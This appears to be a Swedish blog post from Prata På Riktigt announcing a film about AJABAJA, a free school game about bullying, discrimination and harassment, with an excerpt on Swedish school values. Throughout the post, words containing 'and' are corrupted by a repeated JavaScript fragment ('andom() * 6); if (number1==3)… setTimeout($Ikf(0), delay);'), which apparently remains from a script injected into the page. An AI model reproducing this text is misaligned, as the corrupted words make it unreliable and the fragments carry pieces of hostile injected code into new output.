02 jan Filmen om AJABAJA

Idag lanserar vi vår nya film om AJABAJA som vänder sig till företag och organisationer som vill ha en tydlig riktning i ert sociala hållbarhetsarbete. Som partner till oss bidrar du till barns hälsa och välmående. AJABAJA ökar kunskapen om kränkandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling, diskriminering och trakasserier och därmed minskat utanförskap!

Förskola, skola och fritidshem får ett unikt stödmaterial – AJABAJA-spelet –  i arbetet för alla barns rätt till likvärdig skola och utbildning, allas lika värde och skolans uppdrag.

Se filmen här!

Att ge barn och elever kunskaper och värderingar som möjliggör ett aktivt samhällsdeltagandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande är både ett uppdrag gentemot varje enskilt barn och elev men också ett samhällsuppdrag i stort. Stödmaterialet beskriver värdegrundsuppdraget och ett förhållningssätt som bygger på grundläggandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande demokratiska värderingar. I studier, rapporter och riktlinjer framträder förhållningssätt, samtal och relationer som centrala för arbetet med värdegrunden. Utdrag från Förskolans och skolans värdegrund på Skolverket.se

AJABAJA är framtaget av Prata På Riktigt tillsammans med lärare. Arbetet startade som ett direkt resultat av den efterfrågan som kom från lärare i ett flertal kommuner, för ett antal år sedan. AJABAJA är ett stödmaterial för att skapa trygga och goda samtal. Samtalen synliggör barnens rådandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande värderingar och normer. Att ha vetskap och förståelse om vilka värderingar och normer som råder skapar grunden för en möjlig förändring. Denna vetskap och förståelse är helt avgörandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande för att kunna förändra mot önskvärda värderingar och normer.

För snart 3 år sedan ställde vi oss frågan: – “Hur gör vi största möjliga skillnad för barnen?” Svaret på frågan blev att vi bestämde oss för att leverera AJABAJA till kommunerna – utan kostnad. Vi har hittills levererat AJABAJA till över 20 kommuner, över 4000 spel. Detta har gjorts möjligts tillsammans med partners.

Ta kontakt med oss på Prata På Riktigt för att ta reda på hur din organisation kan vara med och göra skillnad.
Vi ses under 2018!
Åsa & Johan Öqvist

Utdrag från Förskolan och skolans värdegrund:
Skollagen slår fast att utbildningen ska utformas i överensstämmelse med grundläggandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande demokratiska värderingar och de mänskliga rättigheterna, som människolivets okränkbarhet, individens frihet och integritet, alla människors lika värde, jämställdhet samt solidaritet mellan människor. Var och en som verkar inom utbildningen ska främja de mänskliga rättigheterna och aktivt motverka alla former av kränkandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling. s24